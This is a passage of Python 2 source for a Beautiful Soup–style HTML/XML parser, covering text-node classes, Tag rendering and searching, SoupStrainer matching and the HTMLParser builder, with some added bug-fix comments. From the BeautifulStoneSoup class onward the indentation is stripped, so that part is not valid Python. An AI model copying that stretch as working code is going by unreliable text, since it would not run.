    """Replace the %SOUP-ENCODING% placeholder in 'str' with the
    given encoding name (falling back to utf-8)."""
    return str.replace("%SOUP-ENCODING%", encoding or "utf-8")
def toEncoding(self, s, encoding=None):
    """Coerce an object to a byte string in 'encoding', or to
    Unicode when no encoding is given."""
    if isinstance(s, unicode):
        if encoding:
            s = s.encode(encoding)
        return s
    if isinstance(s, str):
        if encoding:
            return s.encode(encoding)
        return unicode(s)
    # Not string-like at all: stringify first, then convert as above.
    if encoding:
        return self.toEncoding(str(s), encoding)
    return unicode(s)
class NavigableString(unicode, PageElement):
    """A plain text node: a unicode string that also participates in
    the parse tree via PageElement."""

    def __new__(cls, value):
        """Create a new NavigableString.

        When unpickling a NavigableString, this method is called with
        the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
        passed in to the superclass's __new__ or the superclass won't know
        how to handle non-ASCII characters.
        """
        if isinstance(value, unicode):
            return unicode.__new__(cls, value)
        return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)

    def __getnewargs__(self):
        # Pickle support: rebuild from the plain unicode value.
        return (unicode(self),)

    def __getattr__(self, attr):
        """text.string gives you text. This is for backwards
        compatibility for Navigable*String, but for CData* it lets you
        get the string without the CData wrapper."""
        if attr != 'string':
            raise AttributeError("'%s' object has no attribute '%s'"
                                 % (self.__class__.__name__, attr))
        return self

    def encode(self, encoding=DEFAULT_OUTPUT_ENCODING):
        # Encode via the (possibly subclass-decorated) decoded form.
        return self.decode().encode(encoding)

    def decodeGivenEventualEncoding(self, eventualEncoding):
        # A bare text node needs no markup wrapper.
        return self
class CData(NavigableString):
    """A text node that renders wrapped in a CDATA section."""

    def decodeGivenEventualEncoding(self, eventualEncoding):
        return u''.join([u'<![CDATA[', self, u']]>'])
class ProcessingInstruction(NavigableString):
    """A text node that renders as a <?...?> processing instruction."""

    def decodeGivenEventualEncoding(self, eventualEncoding):
        body = self
        if u'%SOUP-ENCODING%' in body:
            # Plug the eventual document encoding into the PI text.
            body = self.substituteEncoding(body, eventualEncoding)
        return u'<?%s?>' % body
class Comment(NavigableString):
    """A text node that renders as an HTML/XML comment."""

    def decodeGivenEventualEncoding(self, eventualEncoding):
        return u'<!--%s-->' % (self,)
class Declaration(NavigableString):
    """A text node that renders as a <!...> declaration (DOCTYPE etc.)."""

    def decodeGivenEventualEncoding(self, eventualEncoding):
        return u'<!%s>' % (self,)
class Tag(PageElement):
    """Represents a found HTML tag with its attributes and contents."""

    def _invert(h):
        "Cheap function to invert a hash."
        # NOTE: no 'self' -- this is called once, below, at
        # class-definition time to build the reverse entity table.
        i = {}
        for k, v in h.items():
            i[v] = k
        return i

    XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'",
                                      "quot" : '"',
                                      "amp" : "&",
                                      "lt" : "<",
                                      "gt" : ">" }

    XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)

    def _convertEntities(self, match):
        """Used in a call to re.sub to replace HTML, XML, and numeric
        entities with the appropriate Unicode characters. If HTML
        entities are being converted, any unrecognized entities are
        escaped."""
        x = match.group(1)
        if self.convertHTMLEntities and x in name2codepoint:
            return unichr(name2codepoint[x])
        elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:
            if self.convertXMLEntities:
                return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]
            else:
                return u'&%s;' % x
        elif len(x) > 0 and x[0] == '#':
            # Handle numeric entities
            if len(x) > 1 and x[1] == 'x':
                return unichr(int(x[2:], 16))
            else:
                return unichr(int(x[1:]))
        elif self.escapeUnrecognizedEntities:
            # BUG FIX: this branch was byte-identical to the fallthrough
            # below, so the "escape" flag had no effect.  Escaping means
            # emitting a literal ampersand entity ('&amp;') so the
            # unrecognized reference survives re-serialization.
            return u'&amp;%s;' % x
        else:
            return u'&%s;' % x

    def __init__(self, parser, name, attrs=None, parent=None,
                 previous=None):
        "Basic constructor."

        # We don't actually store the parser object: that lets extracted
        # chunks be garbage-collected
        self.parserClass = parser.__class__
        self.isSelfClosing = parser.isSelfClosingTag(name)
        self.name = name
        if attrs == None:
            attrs = []
        self.attrs = attrs
        self.contents = []
        self.setup(parent, previous)
        self.hidden = False
        self.containsSubstitutions = False
        self.convertHTMLEntities = parser.convertHTMLEntities
        self.convertXMLEntities = parser.convertXMLEntities
        self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities

        def convert(kval):
            "Converts HTML, XML and numeric entities in the attribute value."
            k, val = kval
            if val is None:
                return kval
            return (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);",
                              self._convertEntities, val))
        self.attrs = map(convert, self.attrs)

    def get(self, key, default=None):
        """Returns the value of the 'key' attribute for the tag, or
        the value given for 'default' if it doesn't have that
        attribute."""
        return self._getAttrMap().get(key, default)

    def has_key(self, key):
        """True if the tag carries the given attribute."""
        return self._getAttrMap().has_key(key)

    def __getitem__(self, key):
        """tag[key] returns the value of the 'key' attribute for the tag,
        and throws an exception if it's not there."""
        return self._getAttrMap()[key]

    def __iter__(self):
        "Iterating over a tag iterates over its contents."
        return iter(self.contents)

    def __len__(self):
        "The length of a tag is the length of its list of contents."
        return len(self.contents)

    def __contains__(self, x):
        return x in self.contents

    def __nonzero__(self):
        "A tag is non-None even if it has no contents."
        return True

    def __setitem__(self, key, value):
        """Setting tag[key] sets the value of the 'key' attribute for the
        tag."""
        self._getAttrMap()
        self.attrMap[key] = value
        found = False
        for i in range(0, len(self.attrs)):
            if self.attrs[i][0] == key:
                self.attrs[i] = (key, value)
                found = True
        if not found:
            self.attrs.append((key, value))
        self._getAttrMap()[key] = value

    def __delitem__(self, key):
        "Deleting tag[key] deletes all 'key' attributes for the tag."
        for item in self.attrs:
            if item[0] == key:
                self.attrs.remove(item)
                #We don't break because bad HTML can define the same
                #attribute multiple times.
            self._getAttrMap()
            if self.attrMap.has_key(key):
                del self.attrMap[key]

    def __call__(self, *args, **kwargs):
        """Calling a tag like a function is the same as calling its
        findAll() method. Eg. tag('a') returns a list of all the A tags
        found within this tag."""
        # Replaced the deprecated apply() builtin with a direct call.
        return self.findAll(*args, **kwargs)

    def __getattr__(self, tag):
        """Attribute access doubles as tag search: tag.fooTag (or just
        tag.foo) is shorthand for tag.find('foo')."""
        #print "Getattr %s.%s" % (self.__class__, tag)
        if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
            return self.find(tag[:-3])
        elif tag.find('__') != 0:
            return self.find(tag)
        raise AttributeError("'%s' object has no attribute '%s'"
                             % (self.__class__, tag))

    def __eq__(self, other):
        """Returns true iff this tag has the same name, the same attributes,
        and the same contents (recursively) as the given tag.

        NOTE: right now this will return false if two tags have the
        same attributes in a different order. Should this be fixed?"""
        if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
            return False
        for i in range(0, len(self.contents)):
            if self.contents[i] != other.contents[i]:
                return False
        return True

    def __ne__(self, other):
        """Returns true iff this tag is not identical to the other tag,
        as defined in __eq__."""
        return not self == other

    def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
        """Renders this tag as a string."""
        return self.decode(eventualEncoding=encoding)

    # Matches angle brackets, and ampersands that don't begin an entity.
    BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
                                           + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
                                           + ")")

    def _sub_entity(self, x):
        """Used with a regular expression to substitute the
        appropriate XML entity for an XML special character."""
        return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";"

    def __unicode__(self):
        return self.decode()

    def __str__(self):
        return self.encode()

    def encode(self, encoding=DEFAULT_OUTPUT_ENCODING,
               prettyPrint=False, indentLevel=0):
        """Render this tag as a byte string in the given encoding."""
        return self.decode(prettyPrint, indentLevel, encoding).encode(encoding)

    def decode(self, prettyPrint=False, indentLevel=0,
               eventualEncoding=DEFAULT_OUTPUT_ENCODING):
        """Returns a string or Unicode representation of this tag and
        its contents. To get Unicode, pass None for encoding."""
        attrs = []
        if self.attrs:
            for key, val in self.attrs:
                fmt = '%s="%s"'
                if isString(val):
                    if (self.containsSubstitutions
                        and eventualEncoding is not None
                        and '%SOUP-ENCODING%' in val):
                        val = self.substituteEncoding(val, eventualEncoding)

                    # The attribute value either:
                    #
                    # * Contains no embedded double quotes or single quotes.
                    #   No problem: we enclose it in double quotes.
                    # * Contains embedded single quotes. No problem:
                    #   double quotes work here too.
                    # * Contains embedded double quotes. No problem:
                    #   we enclose it in single quotes.
                    # * Embeds both single _and_ double quotes. This
                    #   can't happen naturally, but it can happen if
                    #   you modify an attribute value after parsing
                    #   the document. Now we have a bit of a
                    #   problem. We solve it by enclosing the
                    #   attribute in single quotes, and escaping any
                    #   embedded single quotes to XML entities.
                    if '"' in val:
                        fmt = "%s='%s'"
                        if "'" in val:
                            # TODO: replace with apos when
                            # appropriate.
                            val = val.replace("'", "&squot;")

                    # Now we're okay w/r/t quotes. But the attribute
                    # value might also contain angle brackets, or
                    # ampersands that aren't part of entities. We need
                    # to escape those to XML entities too.
                    val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)
                if val is None:
                    # Handle boolean attributes.
                    decoded = key
                else:
                    decoded = fmt % (key, val)
                attrs.append(decoded)
        close = ''
        closeTag = ''
        if self.isSelfClosing:
            close = ' /'
        else:
            closeTag = '</%s>' % self.name

        indentTag, indentContents = 0, 0
        if prettyPrint:
            indentTag = indentLevel
            # 'space' is only defined (and only used) when pretty-printing.
            space = (' ' * (indentTag-1))
            indentContents = indentTag + 1
        contents = self.decodeContents(prettyPrint, indentContents,
                                       eventualEncoding)
        if self.hidden:
            # The root [document] tag renders only its contents.
            s = contents
        else:
            s = []
            attributeString = ''
            if attrs:
                attributeString = ' ' + ' '.join(attrs)
            if prettyPrint:
                s.append(space)
            s.append('<%s%s%s>' % (self.name, attributeString, close))
            if prettyPrint:
                s.append("\n")
            s.append(contents)
            if prettyPrint and contents and contents[-1] != "\n":
                s.append("\n")
            if prettyPrint and closeTag:
                s.append(space)
            s.append(closeTag)
            if prettyPrint and closeTag and self.nextSibling:
                s.append("\n")
            s = ''.join(s)
        return s

    def decompose(self):
        """Recursively destroys the contents of this tree."""
        contents = [i for i in self.contents]
        for i in contents:
            if isinstance(i, Tag):
                i.decompose()
            else:
                i.extract()
        self.extract()

    def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
        """Render this tag indented, one element per line."""
        return self.encode(encoding, True)

    def encodeContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
                       prettyPrint=False, indentLevel=0):
        """Render only this tag's contents as a byte string."""
        return self.decodeContents(prettyPrint, indentLevel).encode(encoding)

    def decodeContents(self, prettyPrint=False, indentLevel=0,
                       eventualEncoding=DEFAULT_OUTPUT_ENCODING):
        """Renders the contents of this tag as a string in the given
        encoding. If encoding is None, returns a Unicode string."""
        s = []
        for c in self:
            text = None
            if isinstance(c, NavigableString):
                text = c.decodeGivenEventualEncoding(eventualEncoding)
            elif isinstance(c, Tag):
                s.append(c.decode(prettyPrint, indentLevel, eventualEncoding))
            if text and prettyPrint:
                text = text.strip()
            if text:
                if prettyPrint:
                    s.append(" " * (indentLevel-1))
                s.append(text)
                if prettyPrint:
                    s.append("\n")
        return ''.join(s)

    #Soup methods

    def find(self, name=None, attrs={}, recursive=True, text=None,
             **kwargs):
        """Return only the first child of this Tag matching the given
        criteria."""
        r = None
        l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
        if l:
            r = l[0]
        return r
    findChild = find

    def findAll(self, name=None, attrs={}, recursive=True, text=None,
                limit=None, **kwargs):
        """Extracts a list of Tag objects that match the given
        criteria.  You can specify the name of the Tag and any
        attributes you want the Tag to have.

        The value of a key-value pair in the 'attrs' map can be a
        string, a list of strings, a regular expression object, or a
        callable that takes a string and returns whether or not the
        string matches for some custom definition of 'matches'. The
        same is true of the tag name."""
        generator = self.recursiveChildGenerator
        if not recursive:
            generator = self.childGenerator
        return self._findAll(name, attrs, text, limit, generator, **kwargs)
    findChildren = findAll

    # Pre-3.x compatibility methods. Will go away in 4.0.
    first = find
    fetch = findAll

    def fetchText(self, text=None, recursive=True, limit=None):
        return self.findAll(text=text, recursive=recursive, limit=limit)

    def firstText(self, text=None, recursive=True):
        return self.find(text=text, recursive=recursive)

    # 3.x compatibility methods. Will go away in 4.0.
    def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
                       prettyPrint=False, indentLevel=0):
        if encoding is None:
            return self.decodeContents(prettyPrint, indentLevel, encoding)
        else:
            return self.encodeContents(encoding, prettyPrint, indentLevel)

    #Private methods

    def _getAttrMap(self):
        """Initializes a map representation of this tag's attributes,
        if not already initialized."""
        # BUG FIX: getattr(self, 'attrMap') with no default triggered
        # __getattr__, which performs a full document search for a tag
        # named 'attrMap' on every call until the cache exists (and could
        # even return a found Tag).  Probe the instance dict directly;
        # a falsy cached value still triggers a rebuild, as before.
        if not self.__dict__.get('attrMap'):
            self.attrMap = {}
            for (key, value) in self.attrs:
                self.attrMap[key] = value
        return self.attrMap

    #Generator methods
    def recursiveChildGenerator(self):
        if not len(self.contents):
            raise StopIteration
        # Walk the .next chain until we leave this tag's subtree.
        stopNode = self._lastRecursiveChild().next
        current = self.contents[0]
        while current is not stopNode:
            yield current
            current = current.next

    def childGenerator(self):
        if not len(self.contents):
            raise StopIteration
        current = self.contents[0]
        while current:
            yield current
            current = current.nextSibling
        raise StopIteration
# Next, a couple classes to represent queries and their results.
class SoupStrainer:
    """Encapsulates a number of ways of matching a markup element (tag or
    text).

    The name, attrs and keyword criteria may each be a string, a list,
    a regular expression object, a callable, or True; see _matches.
    """

    def __init__(self, name=None, attrs={}, text=None, **kwargs):
        self.name = name
        # A bare string in the attrs position is shorthand for matching
        # the CSS class attribute.
        if isString(attrs):
            kwargs['class'] = attrs
            attrs = None
        if kwargs:
            if attrs:
                # Don't mutate the caller's dict.
                attrs = attrs.copy()
                attrs.update(kwargs)
            else:
                attrs = kwargs
        self.attrs = attrs
        self.text = text

    def __str__(self):
        if self.text:
            return self.text
        else:
            return "%s|%s" % (self.name, self.attrs)

    def searchTag(self, markupName=None, markupAttrs={}):
        """Match a tag, given either a Tag object (markupName) or a
        (name, attrs) pair from the parser.  Returns the matched
        object, or None."""
        found = None
        markup = None
        if isinstance(markupName, Tag):
            markup = markupName
            markupAttrs = markup
        callFunctionWithTagData = callable(self.name) \
                                  and not isinstance(markupName, Tag)

        if (not self.name) \
               or callFunctionWithTagData \
               or (markup and self._matches(markup, self.name)) \
               or (not markup and self._matches(markupName, self.name)):
            if callFunctionWithTagData:
                # A callable name criterion decides by itself, using
                # both the tag name and the attribute list.
                match = self.name(markupName, markupAttrs)
            else:
                match = True
                markupAttrMap = None
                for attr, matchAgainst in self.attrs.items():
                    if not markupAttrMap:
                        if hasattr(markupAttrs, 'get'):
                            markupAttrMap = markupAttrs
                        else:
                            # Convert the parser's (key, value) list
                            # into a map, lazily, on first use.
                            markupAttrMap = {}
                            for k, v in markupAttrs:
                                markupAttrMap[k] = v
                    attrValue = markupAttrMap.get(attr)
                    if not self._matches(attrValue, matchAgainst):
                        match = False
                        break
            if match:
                if markup:
                    found = markup
                else:
                    found = markupName
        return found

    def search(self, markup):
        """Match any kind of markup: a list of elements, a Tag, or a
        piece of text.  Returns the matched object, or None."""
        #print 'looking for %s in %s' % (self, markup)
        found = None
        # If given a list of items, scan it for a text element that
        # matches.
        if isList(markup) and not isinstance(markup, Tag):
            for element in markup:
                if isinstance(element, NavigableString) \
                       and self.search(element):
                    found = element
                    break
        # If it's a Tag, make sure its name or attributes match.
        # Don't bother with Tags if we're searching for text.
        elif isinstance(markup, Tag):
            if not self.text:
                found = self.searchTag(markup)
        # If it's text, make sure the text matches.
        elif isinstance(markup, NavigableString) or \
                 isString(markup):
            if self._matches(markup, self.text):
                found = markup
        else:
            raise Exception, "I don't know how to match against a %s" \
                  % markup.__class__
        return found

    def _matches(self, markup, matchAgainst):
        """Match one value (a tag, tag name, attribute value or text
        node) against one criterion."""
        #print "Matching %s against %s" % (markup, matchAgainst)
        result = False
        # A criterion of literal True matches anything that exists.
        if matchAgainst == True and type(matchAgainst) == types.BooleanType:
            result = markup != None
        elif callable(matchAgainst):
            result = matchAgainst(markup)
        else:
            #Custom match methods take the tag as an argument, but all
            #other ways of matching match the tag name as a string.
            if isinstance(markup, Tag):
                markup = markup.name
            if markup is not None and not isString(markup):
                markup = unicode(markup)
            #Now we know that chunk is either a string, or None.
            if hasattr(matchAgainst, 'match'):
                # It's a regexp object.
                result = markup and matchAgainst.search(markup)
            elif (isList(matchAgainst)
                  and (markup is not None or not isString(matchAgainst))):
                result = markup in matchAgainst
            elif hasattr(matchAgainst, 'items'):
                # NOTE(review): 'markup' is a string here, and strings
                # have no has_key, so a dict criterion raises
                # AttributeError -- presumably this was meant to be
                # matchAgainst.has_key(markup); confirm before relying
                # on dict-valued criteria.
                result = markup.has_key(matchAgainst)
            elif matchAgainst and isString(markup):
                # Normalize the criterion to the markup's string type
                # before the final equality check below.
                if isinstance(markup, unicode):
                    matchAgainst = unicode(matchAgainst)
                else:
                    matchAgainst = str(matchAgainst)

            if not result:
                result = matchAgainst == markup
        return result
class ResultSet(list):
    """A ResultSet is just a list that keeps track of the SoupStrainer
    that created it."""

    def __init__(self, source):
        """Create an empty result list.

        :param source: the SoupStrainer that produced these results.
        """
        # BUG FIX: the original called list.__init__([]), which
        # initialized a throwaway list literal instead of this instance.
        list.__init__(self)
        self.source = source
# Now, some helper functions.
def isList(l):
    """Convenience method that works with all 2.x versions of Python
    to determine whether or not something is listlike."""
    # Anything iterable that isn't a string counts, as does anything
    # whose concrete type is list or tuple.
    if hasattr(l, '__iter__') and not isString(l):
        return True
    return type(l) in (types.ListType, types.TupleType)
def isString(s):
    """Convenience method that works with all 2.x versions of Python
    to determine whether or not something is stringlike."""
    try:
        # Python 2: accept both unicode and byte strings.
        return isinstance(s, (unicode, basestring))
    except NameError:
        # No 'unicode' builtin: fall back to plain str.
        return isinstance(s, str)
def buildTagMap(default, *args):
    """Turns a list of maps, lists, or scalars into a single map.
    Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
    NESTING_RESET_TAGS maps out of lists and partial maps."""
    built = {}
    for portion in args:
        if hasattr(portion, 'items'):
            # A map: merge its entries as-is.
            for key, value in portion.items():
                built[key] = value
        elif isList(portion) and not isString(portion):
            # A list: every item maps to the default.
            for item in portion:
                built[item] = default
        else:
            # A scalar: map it directly to the default.
            built[portion] = default
    return built
# Now, the parser classes.
class HTMLParserBuilder(HTMLParser):
    """Drives HTMLParser over the markup and forwards the parse events
    to a soup (BeautifulStoneSoup) object, converting entities and
    wrapping special constructs in the right NavigableString subclass."""

    def __init__(self, soup):
        HTMLParser.__init__(self)
        self.soup = soup

    # We inherit feed() and reset().

    def handle_starttag(self, name, attrs):
        if name == 'meta':
            # <meta> may declare the document's encoding.
            self.soup.extractCharsetFromMeta(attrs)
        else:
            self.soup.unknown_starttag(name, attrs)

    def handle_endtag(self, name):
        self.soup.unknown_endtag(name)

    def handle_data(self, content):
        self.soup.handle_data(content)

    def _toStringSubclass(self, text, subclass):
        """Adds a certain piece of text to the tree as a NavigableString
        subclass."""
        self.soup.endData()
        self.handle_data(text)
        self.soup.endData(subclass)

    def handle_pi(self, text):
        """Handle a processing instruction as a ProcessingInstruction
        object, possibly one with a %SOUP-ENCODING% slot into which an
        encoding will be plugged later."""
        if text[:3] == "xml":
            text = u"xml version='1.0' encoding='%SOUP-ENCODING%'"
        self._toStringSubclass(text, ProcessingInstruction)

    def handle_comment(self, text):
        "Handle comments as Comment objects."
        self._toStringSubclass(text, Comment)

    def handle_charref(self, ref):
        "Handle character references as data."
        if self.soup.convertEntities:
            data = unichr(int(ref))
        else:
            data = '&#%s;' % ref
        self.handle_data(data)

    def handle_entityref(self, ref):
        """Handle entity references as data, possibly converting known
        HTML and/or XML entity references to the corresponding Unicode
        characters."""
        data = None
        if self.soup.convertHTMLEntities:
            try:
                data = unichr(name2codepoint[ref])
            except KeyError:
                pass

        if not data and self.soup.convertXMLEntities:
            data = self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)

        if not data and self.soup.convertHTMLEntities and \
            not self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):
            # TODO: We've got a problem here. We're told this is
            # an entity reference, but it's not an XML entity
            # reference or an HTML entity reference. Nonetheless,
            # the logical thing to do is to pass it through as an
            # unrecognized entity reference.
            #
            # Except: when the input is "&carol;" this function
            # will be called with input "carol". When the input is
            # "AT&T", this function will be called with input
            # "T". We have no way of knowing whether a semicolon
            # was present originally, so we don't know whether
            # this is an unknown entity or just a misplaced
            # ampersand.
            #
            # The more common case is a misplaced ampersand, so I
            # escape the ampersand and omit the trailing semicolon.
            #
            # BUG FIX: the code said '"&%s" % ref', which does NOT
            # escape the ampersand as the comment above promises --
            # the '&amp;' had been collapsed to '&'.
            data = "&amp;%s" % ref
        if not data:
            # This case is different from the one above, because we
            # haven't already gone through a supposedly comprehensive
            # mapping of entities to Unicode characters. We might not
            # have gone through any mapping at all. So the chances are
            # very high that this is a real entity, and not a
            # misplaced ampersand.
            data = "&%s;" % ref
        self.handle_data(data)

    def handle_decl(self, data):
        "Handle DOCTYPEs and the like as Declaration objects."
        self._toStringSubclass(data, Declaration)

    def parse_declaration(self, i):
        """Treat a bogus SGML declaration as raw data. Treat a CDATA
        declaration as a CData object."""
        j = None
        if self.rawdata[i:i+9] == '<![CDATA[':
            k = self.rawdata.find(']]>', i)
            if k == -1:
                # Unterminated CDATA: swallow to end of input.
                k = len(self.rawdata)
            data = self.rawdata[i+9:k]
            j = k+3
            self._toStringSubclass(data, CData)
        else:
            try:
                j = HTMLParser.parse_declaration(self, i)
            except HTMLParseError:
                # Bogus declaration: hand it through as raw text.
                toHandle = self.rawdata[i:]
                self.handle_data(toHandle)
                j = i + len(toHandle)
        return j
class BeautifulStoneSoup(Tag):
"""This class contains the basic parser and search code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
PRESERVE_WHITESPACE_TAGS = []
MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda x: x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda x: '<!' + x.group(1) + '>')
]
ROOT_TAG_NAME = u'[document]'
HTML_ENTITIES = "html"
XML_ENTITIES = "xml"
XHTML_ENTITIES = "xhtml"
# TODO: This only exists for backwards-compatibility
ALL_ENTITIES = XHTML_ENTITIES
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
markupMassage=True, smartQuotesTo=XML_ENTITIES,
convertEntities=None, selfClosingTags=None, isHTML=False,
builder=HTMLParserBuilder):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser.
HTMLParser will process most bad HTML, and the BeautifulSoup
class has some tricks for dealing with some HTML that kills
HTMLParser, but Beautiful Soup can nonetheless choke or lose data
if your data uses self-closing tags or declarations
incorrectly.
By default, Beautiful Soup uses regexes to sanitize input,
avoiding the vast majority of these problems. If the problems
don't apply to you, pass in False for markupMassage, and
you'll get better performance.
The default parser massage techniques fix the two most common
instances of invalid HTML that choke HTMLParser:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
self.parseOnlyThese = parseOnlyThese
self.fromEncoding = fromEncoding
self.smartQuotesTo = smartQuotesTo
self.convertEntities = convertEntities
# Set the rules for how we'll deal with the entities we
# encounter
if self.convertEntities:
# It doesn't make sense to convert encoded characters to
# entities even while you're converting entities to Unicode.
# Just convert it all to Unicode.
self.smartQuotesTo = None
if convertEntities == self.HTML_ENTITIES:
self.convertXMLEntities = False
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = True
elif convertEntities == self.XHTML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = False
elif convertEntities == self.XML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
else:
self.convertXMLEntities = False
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
self.builder = builder(self)
self.reset()
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
self.markup = markup
self.markupMassage = markupMassage
try:
self._feed(isHTML=isHTML)
except StopParsing:
pass
self.markup = None # The markup can now be GCed.
self.builder = None # So can the builder.
def _feed(self, inDocumentEncoding=None, isHTML=False):
# Convert the document to Unicode.
markup = self.markup
if isinstance(markup, unicode):
if not hasattr(self, 'originalEncoding'):
self.originalEncoding = None
else:
dammit = UnicodeDammit\
(markup, [self.fromEncoding, inDocumentEncoding],
smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)
markup = dammit.unicode
self.originalEncoding = dammit.originalEncoding
self.declaredHTMLEncoding = dammit.declaredHTMLEncoding
if markup:
if self.markupMassage:
if not isList(self.markupMassage):
self.markupMassage = self.MARKUP_MASSAGE
for fix, m in self.markupMassage:
markup = fix.sub(m, markup)
# TODO: We get rid of markupMassage so that the
# soup object can be deepcopied later on. Some
# Python installations can't copy regexes. If anyone
# was relying on the existence of markupMassage, this
# might cause problems.
del(self.markupMassage)
self.builder.reset()
self.builder.feed(markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def isSelfClosingTag(self, name):
"""Returns true iff the given string is the name of a
self-closing tag according to this parser."""
return self.SELF_CLOSING_TAGS.has_key(name) \
or self.instanceSelfClosingTags.has_key(name)
def reset(self):
Tag.__init__(self, self, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.currentData = []
self.currentTag = None
self.tagStack = []
self.quoteStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
# Tags with just one string-owning child get the child as a
# 'string' property, so that soup.tag.string is shorthand for
# soup.tag.contents[0]
if len(self.currentTag.contents) == 1 and \
isinstance(self.currentTag.contents[0], NavigableString):
self.currentTag.string = self.currentTag.contents[0]
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = u''.join(self.currentData)
if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
not set([tag.name for tag in self.tagStack]).intersection(
self.PRESERVE_WHITESPACE_TAGS)):
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parseOnlyThese and len(self.tagStack) <= 1 and \
(not self.parseOnlyThese.text or \
not self.parseOnlyThese.search(currentData)):
return
o = containerClass(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.
<p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in range(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurance.
popTo = name
break
if (nestingResetTriggers != None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers == None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
    def unknown_starttag(self, name, attrs, selfClosing=0):
        """Handle an opening tag: possibly pop enclosing tags via
